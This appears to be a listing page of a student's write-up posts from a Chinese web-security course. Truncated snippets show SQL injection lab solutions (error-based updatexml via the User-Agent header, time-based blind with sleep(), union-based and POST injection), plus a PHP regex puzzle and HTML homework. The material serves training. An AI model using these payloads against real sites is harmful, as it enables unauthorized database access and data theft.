小021--6.5.1 6.5.3-SQL注入-Header注入Rank 1-3 --解题笔记
6.5.11. 通过新学的 updatexml() 更新xml文档的函数 报错查出数据库 插入到 User Agent1' and updatexml(1,concat(0x7e,(select database()),0x7e),1),'','')# security2. 查询表名1' and updatexml
小021-6.4.1-6.4.3SQL注入-延时注入Rank 1-Rank 3 --解题笔记
6.4.1 1 1' and if(length(database())=8,0,sleep(15)) %23 测试出字符串长度为 8 以下ture是第一个语句正确,他没有执行第三个睡眠语句,false反之
小021-6.6.1-6.6.3 SQL注入-Post注入Rank 1 -解题笔记
6.6.1 解题笔记 1 ' or 1=1 order by 2# 3尝试,知道有2个字段 2 ' or 1=2 union select 1,2# 找出输出点 1 2都是输出点 3 ' or 1=2 union select 1,group_concat
小021-6.1.1-6.1.4 SQL注入-显错注入Rank 1-解题笔记
6.1.1 解题笔记1 打开网页 在地址中输入,?id=1 and 1=2 会发现网页没有报错,但是 我们执行的代码已经在网页中显示可以看到我们添加的 and 1=2被括号起来了。所以没有生效,我们要补全前面的 ' 然后注释掉 后面的 ’2 我们直接拼接?id=1' order by 3 %23 如下图网页正常 order by 4 数据库出错。
小021-彩蛋题——正则匹配-解题思路
<?php $key='flag{********************************}'; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"]), $match); &
小021 --后端+表单验证作业
注册表单: <!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf8" /> <title>用户注册</title
小021-第一章:为了女神小芳!-解题笔记
1. 输入 and1=1 正常 and1=2报错,确认有注入点2. 输入 order by 确认注入点 1 2 正常 3报错, 证明改数据库中有2个字段。3. 输入 and 1=2 UNION SELECT 1,version() 利用联合查询拼接语句,拼接字段,查询数据库版本 5.5.534.
2.2、HTML常见标签 - QQ空间框架【作业】-021
<!DOCTYPE HTML><html> <head> <title>登录-Track</title> <style> body{ background: #e5efff; } </style> </head> <body> <div id="biaodan&quo
第一课作业-html-021
<!DOCTYPE HTML><HTML> <HEAD> <mate chiarset="utf-8"> <title>HTML-用基础标签编写一个网页-小021的第一课作业</title> </HEAD> <body> <h1>我叫小021</h1>